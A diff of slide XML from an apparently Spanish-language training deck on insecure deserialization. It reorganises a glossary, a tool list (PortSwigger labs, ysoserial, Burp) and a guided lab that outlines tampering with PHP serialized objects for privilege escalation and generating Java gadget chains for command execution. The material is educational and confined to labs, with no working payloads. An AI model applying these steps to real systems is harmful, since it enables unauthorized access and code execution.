                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Identifica datos serializados (cookies con Base64 que decodifican a objetos, campos O:8:... en PHP).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  En un lab PHP, decodifica el objeto serializado y manipula un atributo (p. ej. admin=true), reserializa y reenvía.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Observa el cambio de estado/privilegio.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  En un lab Java, detecta el objeto serializado y usa ysoserial para generar una gadget chain que ejecute un comando.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Confirma la ejecución con una interacción OOB hacia Collaborator.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Para Python, analiza un endpoint que deserializa pickle y demuestra el riesgo con un payload controlado en el lab.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Documenta el formato, la manipulación y el impacto.</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Serialización — Convertir un objeto en bytes para guardar o transmitir</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Deserialización — Reconstruir el objeto a partir de los bytes</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Deserialización insegura — Reconstruir datos del usuario que ejecutan código</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Gadget — Método que se ejecuta al deserializar y es útil al atacante</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Gadget chain — Encadenar gadgets ya presentes para lograr RCE</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Métodos mágicos — wakeup, readObject, reduce invocados al deserializar</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4554,7 +4945,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4592,82 +4983,37 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Decodifica y modifica un objeto PHP serializado para escalar privilegios.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Explica qué es una gadget chain y por qué depende de las librerías presentes.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Genera un payload con ysoserial y explica qué gadget usa.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Describe por qué pickle.loads sobre datos externos es peligroso.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Enumera magic methods relevantes en PHP, Java y Python.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Propón alternativas seguras (JSON con validación de esquema, firmas).</a:t>
+              <a:t>•  PortSwigger labs de insecure deserialization.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ysoserial (Java) y ysoserial.net (.NET).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Burp para manipular los objetos serializados en cookies/parámetros.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4718,7 +5064,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4756,22 +5102,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Resuelve un lab de deserialización de PortSwigger: primero uno de manipulación de atributos y, si llegas, uno de RCE con gadget chain.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: al menos el lab de manipulación queda resuelto con evidencia del cambio de privilegio; documentas el formato serializado y por qué deserializar input no confiable es la causa raíz.</a:t>
+              <a:t>•  Identifica datos serializados (cookies con Base64 que decodifican a objetos, campos O:8:... en PHP).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  En un lab PHP, decodifica el objeto serializado y manipula un atributo (p. ej. admin=true), reserializa y reenvía.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Observa el cambio de estado/privilegio.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  En un lab Java, detecta el objeto serializado y usa ysoserial para generar una gadget chain que ejecute un comando.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Confirma la ejecución con una interacción OOB hacia Collaborator.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Para Python, analiza un endpoint que deserializa pickle y demuestra el riesgo con un payload controlado en el lab.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Documenta el formato, la manipulación y el impacto.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
